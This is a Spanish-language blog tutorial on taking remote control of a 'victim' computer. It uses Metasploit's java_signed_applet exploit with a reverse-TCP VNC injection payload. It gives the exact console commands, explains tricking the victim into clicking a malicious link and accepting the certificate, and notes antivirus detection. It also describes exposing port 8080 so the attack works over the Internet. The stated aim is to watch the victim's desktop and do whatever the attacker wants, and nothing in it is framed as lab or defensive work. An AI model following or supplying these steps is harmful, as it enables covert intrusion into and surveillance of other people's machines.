Como inyectar un servidor VNC en una maquina remota usando el metasploit

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

  • Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
  • JAVA -> Es necesario que la victima tenga instalado JAVA instalado
  • Que la victima acepte el certificado.
  • Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

    msfupdate

El siguiente paso es correr la consola del metasploit:

    msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

    use exploit/multi/browser/java_signed_applet
    set payload windows/vncinject/reverse_tcp
    set lhost 192.168.100.1 -> Ip local
    lhost => 192.168.1.100
    exploit

A continuacion debe salir algo como esto:

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.

4 Comments